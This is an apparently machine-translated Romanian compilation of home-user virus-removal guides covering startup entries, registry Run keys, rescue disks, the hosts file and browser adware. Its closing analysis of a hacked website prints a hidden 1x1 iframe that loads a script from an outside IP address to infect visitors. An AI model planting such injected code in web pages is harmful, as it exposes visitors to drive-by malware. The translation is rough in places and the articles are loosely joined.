- Prima scrisoare. Bună ziua, am o problemă cu dvs. și anume, am descărcat un curs pe un site, am început să deschid fișierul și, în loc de programul Microsoft Office Word, a început un fel de instalare. Imediat, programul antivirus a emis un avertisment despre o amenințare detectată provenind din folder
C: \ Utilizatori \ Numele meu de utilizator \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Startup.
După cum am înțeles, folderul Start Menu este folderul Startup. În ciuda faptului că computerul a început să încetinească îngrozitor, am intrat în acest folder și am văzut un fișier ciudat numit QJFGSXETY, fișierul are un atribut ascuns. O încercare de ștergere a fișierului a eșuat. A pornit în modul sigur, dar acolo nu a fost posibil să-l ștergeți și să-l redenumiți (care urma să fie șters după o repornire). Am încercat să-l folosesc, dar a apărut mesajul „Restaurare sistem a fost dezactivată de politica de grup”. Aici s-au încheiat cunoștințele mele despre hackeri, stau aici fără computer și citesc articolele tale. Ce să faci dacă poți pas cu pas. Marina. Suzdal
- A doua scrisoare. Pur și simplu nu pot elimina virusul de pe computer, la început s-a înregistrat la pornire, nu l-am putut elimina pe cont propriu, chiar și în, computerul a durat teribil de mult să pornească și a încetinit în timpul funcționării, a urmat sfaturile de la articolul și a descărcat discul de salvare ESET NOD32 (apropo, îl poți folosi ca un simplu Live CD, lucru la îndemână, recomand). Am verificat tot computerul cu el, am găsit 5 programe malware, am stat o oră, am repornit și virusul a dispărut, dar am fost încântat devreme, internetul a dispărut, există un triunghi galben în conexiunile de rețea și spune - Conexiunea la rețea este limitată sau absentă. Ce ar trebui să fac, atunci nu am eliminat complet virusul? Fedor.
Cum să eliminați un virus de pe computer
Am avut aceleași probleme acum câteva zile, un coleg de clasă mi-a cerut să instalez câteva programe gratuite pentru el și programul antivirus ESET NOD32, pe care l-a achiziționat de la birou. site-ul. Pe lângă NOD32, am instalat un program gratuit care controlează pornirea, am creat și o imagine a sistemului și un disc de recuperare, pentru orice eventualitate, mi-a mulțumit, apoi ne-am despărțit.
O zi mai târziu, un cunoscut de-al meu sună îngrijorat și vorbește. Ascultă, bătrâne, o scrisoare a venit fiicei mele pe internet, am deschis-o, se pare că există o carte poștală, felicitări la mulți ani, deși ziua de naștere a trecut deja de mult, pe lângă cartea poștală, mai exista un fișier, am dat clic pe el, chiar acolo AnVir Task Manager a afișat o fereastră , în care a spus că un program cu un nume ciudat și o pictogramă de fișier de sistem vrea să meargă la pornire,
am permis și am început, programul antivirus înjură constant și afișează un avertisment amenințător - Curățarea este imposibilă, în timp ce computerul se blochează prost și l-am oprit anormal, probabil că v-ați întâlnit cu asta, ajutor cât puteți.
Am venit la ei, primul gând a fost - au apucat, pornesc computerul și asta este.
NOD32 afișează pe rând două ferestre, în care avertizează că există un proces rău intenționat în RAM, curățarea este imposibilă! din folderul Startup.
În Windows 7, folderul de pornire se află la:
C: \ Utilizatori \ Nume utilizator \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Startup.
Apropo, în Windows XP, folderul de pornire se află aproape la fel:
AnVir Task Manager arată 93% de utilizare a procesorului.
C: \ Utilizatori \ Nume utilizator \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Startup.
Și aici este fișierul nostru de virus, încerc să-l șterg, bineînțeles fără succes, pentru că acum este ocupat cu o problemă importantă.
Primul lucru de făcut în astfel de cazuri este să rulați System Restore și să încercați să reveniți utilizând punctul de restaurare creat anterior. Încerc să rulez restaurarea sistemului și nu se întâmplă nimic de foarte mult timp.
Apropo, virusul face uneori afaceri în politici de grup și nu veți putea începe restaurarea sistemului cu un astfel de mesaj " Restaurarea sistemului este dezactivată de politica de grup".
Apoi trebuie să accesați Politicile de grup Start-Run-gpedit.msc. O.K
Se deschide Politica de grup, aici trebuie să selectăm Configurație computer-Șabloane administrative-System-Restaurare sistem-Dacă faceți dublu clic pe butonul din stânga pe elementul Disable System Restore,
ar trebui să apară o astfel de fereastră, pentru funcționarea normală a recuperării sistemului, în ea trebuie să bifați elementul „Neconfigurat” sau „Dezactivat”. Totul va intra în vigoare după repornire. De asemenea, trebuie să știți că nu există o politică de grup în versiunile Windows Home.
Nu am reușit să pornesc restaurarea sistemului și am decis să repornesc computerul și să intru în modul sigur. V Modul sigur puteți încerca din nou să eliminați acest fișier de la pornire, în majoritatea cazurilor veți reuși.
Dar nimic nu funcționează pentru mine, se pare că cazul este special și fișierul rău intenționat nu este șters. Apoi mergem la registru, și anume, ne uităm la sucursală:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run.
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ RunOnce
În Windows 7 și Windows XP, pentru toți utilizatorii, programele lansate la conectare își lasă cheile în aceste ramuri, dar mai ales în prima Run. Toate cheile necunoscute trebuie șterse, dar numai cele necunoscute, în cazul meu cheia programului antivirus NOD32 - egui.exe este prezentă la pornire, nu este necesar să o ștergeți:
„C:\Program Files\ESET\ESET Smart Security\egui.exe” / hide / waitservice
De asemenea, trebuie să mergeți la Start-> Run-> msconfig-> Startup și să debifați toate programele necunoscute. Nici aici nu este nimic suspect.
De asemenea, ștergeți toate fișierele necunoscute din rădăcina unității (C :), dacă vedeți acolo fișiere cu același nume QYSGFXZJ sau similar, încercați să le ștergeți. La rădăcină (C :), apropo, avem un folder de neînțeles QYSGFXZJ. Încerc să șterg, este șters.
Asa de, cum să eliminați un virus de pe un computer, dacă nici în modul sigur nu am reușit sau, de exemplu, nu ați putut intra în modul sigur din anumite motive? Uneori intri în Safe Mode, dar acolo te așteaptă o surpriză - de exemplu, mouse-ul nu funcționează.
Dacă nu reușiți să intrați în modul sigur, atunci puteți folosi un sfat foarte simplu și dovedit din celălalt articol al nostru Cum să vă scanați computerul pentru viruși gratuit folosind discul de recuperare ESET NOD32 sau Dr.Web. Apropo, aceste discuri pot fi folosite ca Live CD-uri. Sau aveți deja un Live CD, încercați să porniți de pe acesta și faceți același lucru ca în modul sigur - mergeți la folderul Startup și ștergeți fișierul rău intenționat. Lucrând în Live CD, puteți rula un scanner antivirus de pe un USB unitate flash, de exemplu Dr. Web CureIt.
Personal, când întâmpin o problemă similară în Windows XP, (despre informațiile Windows 7 de mai jos), uneori nici nu intru în Safe Mode, ci folosesc arma perfectă de modă veche - un instrument profesionist de administrator de sistem.
- Notă: toate caracteristicile discului de recuperare ERD Commander 5.0. sunt descrise în articolul nostru ERD Commander. Cu acesta, puteți restaura sistemul, edita registrul, schimba o parolă uitată și multe altele. Pentru computerele și laptopurile moderne, este necesar ERD Commander 5.0 cu drivere SATA integrate. Să pornim de la ea și să vedem cum merg lucrurile.
Repornim și mergem la BIOS, acolo setăm boot-ul de pe unitatea de dischetă. Pornim de pe discul ERD Commander 5.0. Alegem prima opțiune de conectare la Windows XP, adică putem lucra cu tine, de exemplu, direct cu registrul sistemului nostru infectat.
Un CD live obișnuit nu vă va oferi această oportunitate. Apropo, dacă selectați a doua opțiune (Niciuna), atunci ERD Commander va funcționa fără a fi conectat la sistem, adică ca un simplu CD Live și apoi multe caracteristici ERD, cum ar fi recuperarea sistemului, vizualizarea obiectelor de pornire, jurnalul de evenimente de sistem etc. nu vă va fi disponibil. ... Dar chiar și din ea uneori se dovedește a fi util.
Desktopul nu este foarte familiar de la început, dar nu este înfricoșător, voi spune din nou că o descriere a tuturor instrumentelor ERD este în articolul nostru ERD Commander.
Accesați direct Instrumentul de administrare Autoruns.
Ne uităm la elementul System, precum și la Administrator, iar aici sunteți, virusul nostru, aici îl vom elimina cu siguranță.
Șterge - ștergem procesul din autorun și gata, virusul nostru a fost eliminat.
Explorer - vă permite să navigați la fișierul de proces.
Apoi verificăm din nou folderul de pornire și nu există nimic acolo.
C: \ Documente și setări \ Administrator \ Meniu principal \ Programe \ Pornire
Mergem, pentru orice eventualitate, la folderul rădăcină al unității (C :), acolo nu este nimic suspect.
Nu vom fi prea leneși să intrăm în registry și să vedem ce programe și-au lăsat cheile la pornire:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run.
Ei bine, aici am eliminat virusul din Windows XP, după o pornire normală, merită să verificați întregul computer pentru viruși.
Și ce zici de Windows 7 - poți întreba dacă prindem un virus în acest sistem de operare și nu îl putem elimina în modul sigur. În primul rând, puteți folosi discurile de salvare (link către articolul de mai sus). În al doilea rând, utilizați un simplu CD Live sau, deoarece sunt un instrument profesionist, discul de recuperare Microsoft Diagnostic and Recovery Toolset. Informații complete despre cum să utilizați acest instrument, de exemplu, atunci când eliminați un banner ransomware, sunt disponibile în articolul „Cum să eliminați un banner”. Aici voi spune că acesta este același instrument ca ERD Commander, doar că a fost creat în primul rând pentru Windows 7. Cu el, puteți, de asemenea, să restaurați sistemul, să schimbați registry, să efectuați operațiuni cu hard diskul, să schimbați o parolă uitată și multe Mai Mult.
Pornim de pe acest disc MS DaRT 6.5. computerul nostru și un ultim lucru. După eliminarea virusului în Windows XP, este posibil ca Internetul să nu funcționeze pentru dvs., acest lucru se datorează încălcărilor pe care virusul le introduce în parametrii rețelei. Uneori, reinstalarea driverelor plăcii de rețea poate ajuta aici sau, în cele mai multe cazuri, utilitarul WinSockFix, care a fost încercat de multe ori, care fixează acești parametri. Îl poți descărca de la birou. pagina programului http://www.winsockfix.nl
Rulați utilitarul și faceți clic pe butonul Fix și gata.
Butonul ReG-Backup V înainte de operare, vă poate face o copie de rezervă a cheilor de registry.
Infectarea unui computer cu viruși nu este un subiect nou pentru fiecare utilizator de computer. La încărcarea sistemului de operare apar diverse ferestre de informații, unele programe nu funcționează corect, pagina de pornire a browserului se modifică și sunt instalate diverse suplimente. De asemenea, se întâmplă ca computerul să nu pornească deloc sau să pornească foarte mult timp, apoi să încetinească în timpul funcționării.
Dacă aveți cel puțin unul dintre semnele de mai sus, atunci cu siguranță ați contractat un virus. Prin urmare, să ne dăm seama în ce moduri puteți elimina singur virusul de pe computer.
Folosind software antivirus
Primul lucru de făcut este să vă scanați computerul folosind programul antivirus instalat. Am Avast instalat, așa că îl arăt. Găsiți pictograma corespunzătoare în tavă și faceți clic pe ea cu mouse-ul.
Se va deschide fereastra principală a programului. Acum asigurați-vă că aveți instalată cea mai recentă definiție a virusului: în „Setări” accesați fila „Actualizare”. Vedeți când a fost primită ultima actualizare, dacă este necesar, faceți clic pe butonul „Actualizare”.
Din lista derulantă, selectați Scanare completăși faceți clic pe „Start”. Dacă aveți instalat un alt program antivirus, găsiți același element în el și activați o scanare completă a computerului.
Astfel, vom efectua o scanare completă a computerului dvs. pentru viruși. Acest proces va dura mult timp - 11 ore, cu toate acestea, totul depinde de cât de multă informație este stocată pe computer - cu cât volumul acestuia este mai mare, cu atât este nevoie de mai mult pentru a verifica.
Când procesul este complet terminat, încercați să vindecați amenințările găsite. Dacă acest lucru nu se poate face, atunci este mai bine să le ștergeți.
Ar fi mai bine dacă am scana computerul pentru viruși cu un alt program antivirus: de exemplu, Dr.Web CureIt sau AVP Tool. Pentru a fi utilizate acasă, dar nu în scopuri comerciale, aceste programe sunt complet gratuite. În plus, nu necesită instalare pe un computer - nu va exista niciun conflict cu antivirusul instalat.
Puteți descărca Dr.Web CureIt de pe site-ul oficial, urmând linkul:
https://free.drweb.ru/download+cureit+free/
AVP Tool este un utilitar din laboratorul Kaspersky care vindecă computerul unui utilizator deja infectat. Descărcați-l de pe site-ul oficial la linkul:
http://www.kaspersky.com/antivirus-removal-tool
Este mai bine să descărcați programe de pe site-ul oficial, astfel încât să fie instalate în el cele mai recente actualizări ale bazei de date de viruși.
Pentru a vă scana computerul utilizând unul dintre utilitarele pe care le-ați ales, treceți în modul sigur: când încărcați sistemul de operare, apăsați butonul F8. Acum rulați programul și faceți o scanare completă.
La sfârșitul procesului, încercați să dezinfectați sau să eliminați amenințările găsite. Vă rugăm să rețineți că, după ștergerea anumitor fișiere, este posibil ca unele programe piratate să nu funcționeze.
Tratarea unui computer de viruși folosind programe antivirus nu ne oferă o garanție de 100% că acum este curat. Acest lucru necesită încă câțiva pași.
Eliminarea programelor de neînțeles de la pornire
În acest moment, aveți nevoie sau de cele pe care le folosiți extrem de rar. Apăsați combinația Win + R și în linia Run scrieți comanda msconfig și faceți clic pe OK.
Se va deschide o fereastră. Aici, casetele de selectare marchează programele care rulează împreună cu sistemul de operare. Dezactivați lansarea tuturor programelor de care nu aveți nevoie: debifați casetele de lângă ele. Căutați programe de neînțeles în listă, cu o locație sau un producător neclar.
Când ați terminat, faceți clic pe Aplicare și OK.
Dacă aveți îndoieli cu privire la dezactivarea unui anumit element din listă, plasați cursorul peste el cu mouse-ul în secțiunea „Comandă” și uitați-vă la locația fișierului. Apoi găsește-l prin exploratorul tău și notează data la care a fost descărcat. Dacă a fost în zilele în care computerul a fost infectat, atunci puteți debifa în siguranță caseta.
Videoclipuri similare:
Verificarea programelor instalate recent
Pentru a face acest lucru, accesați „Start” - "Panou de control" – "Programe si caracteristici".
În fereastra următoare, faceți clic pe coloana „Instalat” și uitați-vă la cele mai recente programe instalate. Dacă printre ele se numără și cele pe care nu le-ați instalat (nume și conținut de neînțeles, necunoscut) - faceți clic pe el cu mouse-ul și faceți clic pe „Șterge”.
Pentru a vă asigura că utilitățile nu lasă urme în urmă, utilizați-l pe un computer. Acest lucru se poate face manual sau folosind utilități speciale.
Videoclipuri similare:
Verificarea proceselor în managerul de activități
Sarcina procesorului central poate încetini semnificativ performanța computerului. Dacă înainte nu existau probleme și îngheață, dar acum vă confruntați cu asta, atunci poate că acesta este rezultatul unui program rău intenționat.
Faceți clic pe butonul „Start” și în bara de căutare intrați "Gestionar de sarcini", apoi apăsați Enter.
Aici accesați fila „Procese” și asigurați-vă că nu există valori foarte mari în coloana „CPU”. Dacă observați ceva suspect, faceți clic dreapta pe această linie și selectați din meniul contextual „Deschideți locația de stocare a fișierelor”.
File Explorer va deschide locația fișierului. Uita-te la „Data modificării” fişier. Dacă se potrivește cu numărul când probabil ați luat virusul, atunci ștergeți acest fișier și reveniți la "Gestionar de sarcini", selectați linia dorită cu mouse-ul și apăsați "Sfarsitul procesului".
Eliminarea fișierelor temporare
În acest moment suntem unde sunt stocate toate fișierele temporare. Mai întâi trebuie să activați vizibilitatea fișierelor și folderelor. Mergem „Începe” - "Panou de control" – „Setări foldere”.
În fereastra următoare, accesați fila „Vizualizare” și puneți un marcator în fața articolului Afișați fișierele, folderele și unitățile ascunse... Faceți clic pe „Aplicați” și „OK”.
Căutăm un alt folder „Temp” pe computer:
C: - Utilizatori - Numele contului TĂU- AppData - Local - Temp
Ștergeți și toate fișierele din el.
Videoclipuri similare:
Verificarea fișierului hosts
Uneori, virușii pot ajunge la fișierul hosts. Mergeți pe următoarea cale:
C: - Windows - System32 - drivere - etc
Faceți clic pe fișierul cu numele „hosts” cu butonul din dreapta al mouse-ului, selectați „Open” și deschideți-l cu notepad.
Pentru sistemul de operare Windows 7, textul ar trebui să fie scris în fișier, ca în figura de mai jos.
Pentru a reduce interogările către memoria cache DNS și serverele DNS, paginile de Internet încărcate frecvent pot fi scrise și în fișierul hosts. Dacă observați informații suspecte acolo, ștergeți-o.
Dacă ați mers în folderul dorit și nu ați găsit fișierul hosts acolo, atunci poate fi din cauza unui virus. Activați vizibilitatea fișierelor și folderelor ascunse așa cum este descris mai sus. Apoi deschideți fișierul hosts care apare și vedeți că textul care ar trebui să fie implicit este scris acolo.
Dacă este schimbat, scrieți totul așa cum trebuie. În cazul în care fișierul nu poate fi editat, creați unul nou cu extensia .txt și numele hosts și scrieți tot textul, ca în imaginea de mai sus - pentru sistemul de operare Windows 7. Pentru alte sisteme de operare, textul este diferit, așa că uită-te pe internet.
Curățăm registrul
Acest lucru trebuie făcut dacă ați dezinstalat programul suspect prin "Programe si caracteristici", sau au terminat un fișier de neînțeles în procese.
Pentru a deschide Editorul Registrului, apăsați combinația Win + R. Apoi, în fereastra Run, scrieți comanda regedit și faceți clic pe OK.
Acum, în fila „Editare”, selectați „Găsiți” sau apăsați combinația Ctrl + F. În bara de căutare, introduceți numele programului sau o parte din numele pe care l-ați șters după "Programe si caracteristici" sau „Instalarea și eliminarea programelor”... În bara de căutare, puteți introduce și numele fișierului, a cărui activitate ați finalizat-o în procese.
Dacă se găsește fie o ramură de registry, fie un parametru după numele său, acesta va trebui șters - selectați parametrul sau cheia de registry cu mouse-ul și apăsați Delete.
Ștergerea memoriei cache a browserului și eliminarea suplimentelor
Dacă virusul este asociat cu un browser, atunci verificați mai întâi unde duc comenzile rapide create pe desktop. Pentru a face acest lucru, faceți clic dreapta pe comanda rapidă a browserului și accesați „Proprietăți”.
Aici, în câmpul „Obiect”, verificați dacă linkul duce la unitatea și folderul în care este instalat browserul. Dacă linkul duce la un fișier suspect, ștergeți comanda rapidă și recreați-o.
Pentru a șterge memoria cache a browserului, utilizați un program special, cum ar fi CCleaner. Descărcați, instalați și rulați-l pe computer. Apoi, în secțiunea „Curățare” din fila „Aplicații”, selectați elementele necesare cu bifă, faceți clic pe „Analiza”, apoi „Curățare”.
Acum accesați fila „Extensii”, dacă vor fi instalate extensii care au nume de neînțeles sau nu le-ați instalat singur - faceți clic pe „Eliminați”.
Creare live CD
Acest lucru este util dacă computerul este blocat de un virus: se pornește, dar sistemul de operare nu se încarcă. Cum să inscripționați un Live CD pe o unitate flash USB sau un disc și să vă curățați computerul, citiți articolul făcând clic pe link.
Pentru a face acest lucru, veți avea nevoie de un alt computer de pe care puteți descărca imaginea, un disc gol sau o unitate flash. De asemenea, va trebui să modificați prioritatea de pornire în BIOS. Puteți citi și un articol despre asta făcând clic pe link.
Ai prins un virus în browser, iar acum reclamele apar în mod constant? Acest lucru este teribil de enervant. Și nu este atât de ușor să vindeci un browser de viruși. Încă trebuie găsite, iar multe antivirusuri moderne pur și simplu nu văd această infecție. De fapt, acesta este motivul pentru care aveți ferestre pop-up, iar paginile de publicitate se deschid în mod constant (de exemplu, Vulcan sau alte cazinouri).
Ce se întâmplă dacă browserul este infectat cu un virus? Găsește și scapă de el 🙂. Mai ales pentru asta, mai jos sunt 6 moduri eficiente de a elimina un virus din browser. Și ca bonus - câteva sfaturi utile despre cum să vă protejați computerul sau laptopul de reinfectare.
Cum știi dacă browser-ul tău a fost infectat? Acest lucru poate fi observat în următoarele simptome:
Unde apar virușii în browser?
Utilizatorii moderni instalează foarte des jocuri, programe, extensii și, în general, nu se uită la ceea ce instalează. Doar faceți clic pe „Next, Next, Done” - și iată un alt virus adware care s-a strecurat în liniște în sistemul dvs. Windows. Ca urmare, apar ferestre pop-up, pagini de publicitate se deschid etc.
Și în 99% din cazuri utilizatorul este de vină. De ce? Da, pentru că, de obicei, tratarea browserului de viruși este necesară după:
Aici puteți adăuga lipsa de antivirus pe un PC sau laptop. Desigur, nu vă va proteja de toți virușii, dar va detecta și elimina unii. Și dacă te gândești cu capul și verifici manual fișierele suspecte cu un antivirus, te va ajuta să eviți multe probleme. Poți fi sigur de asta.
Cum să vă curățați browserul de viruși și reclame
Ne-am dat seama care sunt cauzele și simptomele virușilor, acum să trecem la lucrul principal. Deci, cum să scapi de virusul adware din browser? Totul depinde de ce fel de infecție ai luat. Cu toate acestea, mai jos este o instrucțiune pas cu pas, în urma căreia vă puteți vindeca browserul de diferiți viruși adware.
Este universal și potrivit pentru orice browser de internet - Google Chrome, Opera, Mozilla Firefox, Yandex Browser, Microsoft Edge. Deci toți utilizatorii îl pot folosi.
Deci, pentru a scăpa de virușii din browser, urmați acești pași:
Rulați o scanare completă a computerului sau laptopului dvs. cu un antivirus
Verificați suplimentele de browser
Unele extensii se instalează singure. Prin urmare, accesați browserul și verificați dacă există suplimente pe care nu le-ați instalat. De asemenea, este recomandat să le ștergeți pe cele pe care nu le utilizați.
Verificați aplicațiile instalate
Pentru a le deschide, accesați Start - Panou de control - Programe și caracteristici.
Uneori, modulele rău intenționate sunt instalate ca software-ul obișnuit (de exemplu, Webalta). Pentru a elimina un virus care lansează reclame într-un browser, trebuie doar să-l găsiți și să-l eliminați din această listă.
Verificați comanda rapidă din browser
Dacă, după lansare, pagina Vulcanului sau a altui site de publicitate se deschide imediat, atunci cel mai probabil problema constă în scurtătura. Uneori, virușii înregistrează în proprietățile comenzii rapide (în câmpul „Obiect”) adresa site-ului, care se deschide la lansarea browserului. Pentru a remedia această problemă, eliminați comanda rapidă și creați una nouă.
Verificați fișierul hosts
De asemenea, mulți viruși editează acest fișier. Drept urmare, atunci când deschideți un site web popular, se deschide altul (în exterior arată la fel și nu veți observa diferența). Și apoi apar mesaje cu o solicitare de a trimite SMS-uri, ferestre pop-up, reclame agresive etc. Există două moduri de a elimina acest virus adware. Primul este cu ajutorul utilitarului antivirus AVZ. Iar al doilea se face manual. Pentru asta:
- Navigați la calea C: \ Windows \ System32 \ drivere \ etc.
- Deschideți fișierul hosts cu notepad.
- Ștergeți liniile inutile. Un fișier hosts normal ar trebui să arate astfel:
Programe pentru curățarea browserului de viruși
Există și programe speciale pentru eliminarea virușilor din browser. Ei văd ce au ratat antivirusurile și ajută la eliminarea modulelor publicitare rău intenționate.
AdwCleaner
Primul program excelent pentru curățarea browserului de reclame și viruși este AdwCleaner (link către site-ul oficial).
Acest utilitar va efectua o căutare rapidă a virușilor în browser și va găsi toate barele de instrumente publicitare, bannere, scripturi rău intenționate. De asemenea, știe cum să curețe comenzile rapide, fișierele și registry.
Malwarebytes
Un alt program eficient pentru curățarea browserelor de viruși. Va scana rapid un PC sau laptop și va ajuta să scăpați de ferestrele pop-up și de reclamele enervante (link către site-ul oficial) Are capacități mai mult decât suficiente pentru a găsi un virus în browser și a-l elimina.
Protecția browserului împotriva reclamelor și virușilor
Și, în sfârșit, așa cum am promis, vă voi oferi câteva sfaturi utile despre cum să vă protejați browserul de viruși:
- Instalați un antivirus pe laptop sau computer. Îl poți elibera. Principalul lucru este să vă amintiți să îl actualizați (sau să activați actualizarea automată). În jumătate din cazuri, vă va ajuta să eliminați virusul din browser. Sau mai degrabă, pentru a preveni infecția. Recomand lectura:.
- Instalați un program pentru a elimina virușii adware. Ceea ce dor de antivirusuri va fi observat de utilități speciale precum AdwCleaner sau HitmanPRO. Cu această combinație, nicio infecție nu va ajunge pur și simplu la computer. Și pentru liniștea ta, rulează periodic o scanare a browserului pentru viruși (de exemplu, o dată pe lună).
- Instalați extensia de browser pentru a bloca reclamele. Poate fi Adblock sau Adguard - la discreția dvs. Și dacă doriți să dezactivați reclamele de pe site-ul sau blogul dvs. preferat (pentru a-i sprijini financiar proprietarul), trebuie doar să adăugați această resursă web la excepție.
Și cel mai important: gândește cu capul! Nu descărcați fișiere exe suspecte (mai ales dacă aveți nevoie de un film în format avi sau mkv), nu urmați link-uri necunoscute, nu mergeți pe site-uri dubioase.
După cum se spune, cel mai bun antivirus este cel de pe cealaltă parte a monitorului 🙂. Adică utilizatorul. Dacă încalci regulile de mai sus, atunci niciun antivirus nu te va ajuta. Trebuie să fii extrem de atent pe Internet - reține asta!
În loc de concluzii
Asta e tot. Acum știți ce să faceți dacă există un virus în browser, precum și o mulțime de modalități de a-l elimina. Dar este mai bine să evitați contaminarea. Și apoi nu vă vor deranja ferestre pop-up, file de anunțuri și bannere.
Ce trebuie să faceți dacă antivirusul nu a făcut față activității sale.& nbsp & nbsp Probabil că ați întâlnit în mod repetat informații în mass-media că a apărut un nou virus teribil, care poate duce la o nouă epidemie teribilă și aproape la sfârșitul internetului. Sau, că a apărut o nouă tehnologie de scriere a virusului, bazată pe utilizarea celor mai puțin semnificative biți de pixeli ai imaginilor grafice, iar corpul virusului este aproape imposibil de detectat. Sau... o mulțime de alte lucruri urâte. Uneori, virușii se înzestrează aproape cu rațiune și conștiință de sine. Acest lucru se întâmplă deoarece mulți utilizatori, confuzi în clasificarea complexă și detaliile mecanismului de funcționare a virușilor, uită că, în primul rând, orice virus este un program de calculator, adică. un set de instrucțiuni ale procesorului (instrucțiuni), formatate într-un anumit mod. Nu contează sub ce formă există acest set (un fișier executabil, un script, o parte a sectorului de boot sau un grup de sectoare din afara sistemului de fișiere) - este mult mai important ca acest program să nu poată obține controlul, de exemplu. începe executarea. Un virus scris pe hard disk, dar care nu rulează, este la fel de inofensiv ca orice alt fișier. Sarcina principală în lupta împotriva virușilor nu este de a detecta corpul virusului, ci de a preveni posibilitatea lansării acestuia. Prin urmare, producătorii de viruși competenți îmbunătățesc în mod constant nu numai tehnologiile de introducere a software-ului rău intenționat în sistem, ci și metodele de lansare și funcționare sub acoperire.
Cum se infectează un computer cu software rău intenționat (virus)? Răspunsul este evident - trebuie să ruleze un program. În mod ideal - cu drepturi administrative, de preferință - fără cunoștința utilizatorului și invizibil pentru acesta. Metodele de lansare sunt îmbunătățite în mod constant și se bazează nu numai pe înșelăciune, ci și pe caracteristicile sau deficiențele sistemului de operare sau ale software-ului aplicației. De exemplu, utilizarea caracteristicii de rulare automată pentru mediile amovibile în mediul sistemului de operare Windows a dus la răspândirea virușilor pe unități flash. Funcțiile de executare automată sunt de obicei apelate de pe medii amovibile sau din foldere de rețea partajate. La pornirea automată, fișierul este procesat Autorun.inf... Acest fișier determină ce comenzi execută sistemul. Multe companii folosesc această funcție pentru a lansa instalatori ai produselor lor software, cu toate acestea, producătorii de viruși au început să o folosească. Ca rezultat, puteți uita de autorun ca o oarecare comoditate atunci când lucrați la un computer. - majoritatea utilizatorilor alfabetizați au dezactivat pentru totdeauna această opțiune.
Pentru a dezactiva funcțiile de executare automată în Windows XP / 2000, un fișier reg pentru import în registry.
Pentru Windows 7 și versiuni ulterioare, puteți dezactiva Redarea automată folosind aplicația Redare automată din Panoul de control. În acest caz, oprirea se aplică utilizatorului curent. O modalitate mai fiabilă de a vă proteja împotriva introducerii de viruși transportați pe dispozitivele amovibile este de a bloca executarea automată pentru toți utilizatorii care utilizează politicile de grup:
& nbsp & nbsp Dar principalul „furnizor” de viruși este, fără îndoială, Internetul și, ca principal aplicație software - „Internet Explorer” (browser). Site-urile devin din ce în ce mai complexe și mai frumoase, apar noi oportunități multimedia, rețelele de socializare cresc, numărul de servere este în continuă creștere și numărul vizitatorilor acestora este în creștere. Browserul de internet se transformă treptat într-un pachet software complex - un interpret al datelor primite din exterior. Cu alte cuvinte, într-un pachet software care execută programe bazate pe conținut necunoscut. Dezvoltatorii de browsere (browsere) lucrează în mod constant pentru a îmbunătăți securitatea produselor lor, dar producătorii de viruși avansează și ei, iar probabilitatea de infectare cu malware a sistemului rămâne destul de mare. Există o părere că dacă nu vizitezi „site-uri pentru adulți”, site-uri cu numere de serie ale produselor software etc. atunci infecția poate fi evitată. Acest lucru nu este în întregime adevărat. Există multe site-uri piratate pe Internet, ai căror proprietari nici măcar nu sunt conștienți de hack. Și au trecut de mult vremurile în care biscuiții își răsfățau vanitatea prin înlocuirea paginilor (defacere). În zilele noastre, un astfel de hack este de obicei însoțit de introducerea în paginile unui site cu totul respectabil, un cod special pentru a infecta computerul vizitatorului. În plus, producătorii de viruși folosesc cei mai populari termeni de căutare pentru a afișa paginile infectate în rezultatele motoarelor de căutare. Interogările cu expresiile „descărcare gratuită” și „descărcare fără înregistrare și SMS” sunt deosebit de populare. Încercați să nu utilizați aceste cuvinte în interogările de căutare, în caz contrar, riscul de a obține un link către site-uri rău intenționate crește semnificativ. Mai ales dacă cauți un film popular care nu a fost încă lansat sau ultimul concert al unei trupe celebre.
& nbsp & nbsp Voi încerca să explic mecanismul de infectare a computerului unui vizitator al site-ului, într-o formă simplificată, cu un exemplu. Nu cu mult timp în urmă, când vizitam un site destul de popular, am primit o notificare de la PT Startup Monitor că aplicația rsvc.exeîncearcă să scrie în registru. Aplicația a fost finalizată cu succes de FAR, iar modificările din registru au fost anulate de PT Startup Monitor. Analiza paginilor site-ului a arătat prezența unui cod ciudat în limbajul Javascript care efectuează operațiuni de transformare a datelor șir care nu sunt text semnificativ. Javascript este acceptat de majoritatea browserelor moderne și este folosit în aproape toate paginile web. Scriptul descărcat de pe astfel de pagini este executat de browserul de Internet. Ca urmare a numeroaselor transformări ale șirurilor menționate mai sus, a fost obținut un cod destul de simplu:
iframe src = „http://91.142.64.91/ts/in.cgi?rut4” lățime = 1 înălțime = 1 stil = „vizibilitate: ascuns”
Adică executarea script-ului CGI a serverului cu adresa IP 91.142.64.91 (care nu are nicio legătură cu site-ul vizitat) într-o fereastră separată (eticheta iframe) care măsoară 1 pixel în lățime și 1 pixel în înălțime, într-o formă invizibilă. fereastră. Rezultatul este o infecție virală foarte probabilă. Mai ales dacă nu există antivirus sau nu va reacționa la amenințare. Acest exemplu de redirecționare ascunsă a unui vizitator către un site rău intenționat folosind eticheta „iframe” probabil că nu este foarte relevant astăzi, dar demonstrează destul de mult cum, în timp ce vizitezi un site legal, poți vizita imperceptibil altul, nu foarte legal, fără să știi măcar. aceasta. Din păcate, nu există o garanție absolută împotriva infecției virale și trebuie să fii pregătit pentru faptul că va trebui să faci față singur virusului.
& nbsp & nbsp Recent, una dintre principalele direcții de dezvoltare a programelor rău intenționate a devenit utilizarea în ele a tuturor tipurilor de protecție împotriva detectării prin instrumente antivirus - așa-numita tehnologie rootkit (rootkit). Asemenea programe fie nu sunt detectate de antivirusi, fie nu sunt eliminate de către aceștia. În acest articol voi încerca să descriu o tehnică mai mult sau mai puțin universală pentru detectarea și eliminarea software-ului rău intenționat dintr-un sistem infectat.
